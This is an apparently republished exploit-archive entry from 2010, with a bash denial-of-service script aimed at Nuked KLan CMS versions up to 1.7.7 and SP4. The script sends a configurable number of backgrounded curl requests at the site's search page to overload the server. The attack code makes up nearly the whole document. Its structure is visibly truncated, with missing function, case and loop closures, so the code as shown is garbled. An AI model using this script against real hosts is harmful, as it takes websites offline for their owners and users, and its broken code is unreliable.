Nuked KLan 1.7.7 & SP4 – Denial of Service

  • 作者: Hamza 'MIzoZ' N
    日期: 2010-01-11
  • 类别:
  • 来源:
  • #!/bin/bash
    # Nuked KLan <= 1.7.7 & <= SP4 DOS
    # Copyright 2009 ; Hamza 'MizoZ' N. <mizozx[at]gmail[dot]com>
    # Needs : cURL
    # This is a DOS issue for Nuked Klan <= 1.7.7 & <= SP4 ,
    # it uses multiple requests on the search page .
    # Tested on Windows Sv 2008 & Gentoo 8.1
    show() {
    echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    echo "Nuked KLan <= 1.7.7 & <= SP4 DOS"
    echo "Author : Hamza 'MIzoZ' N. < mizozx[at]gmail[dot]com"
    echo "Usage: sh $0 -h [HOST] -r 1000"
    echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
    echo ""
    while [[ $# != 0 ]]; do
    arg_name=$1; shift
    case "$arg_name" in
    -h) host=$1; shift;;
    -r) requests=$1; shift;;
    *) echo "invalid option: $1"; show;exit 1;;
    [ -z "$host" ] && { show; exit 1; }
    for random in `seq 1 $requests`; do
    curl -A Firefox -o --url "$host/index.php?file=Search&op=mod_search&main=site" > /dev/null 2>&1 &
    sleep 0.001;
    echo "~~";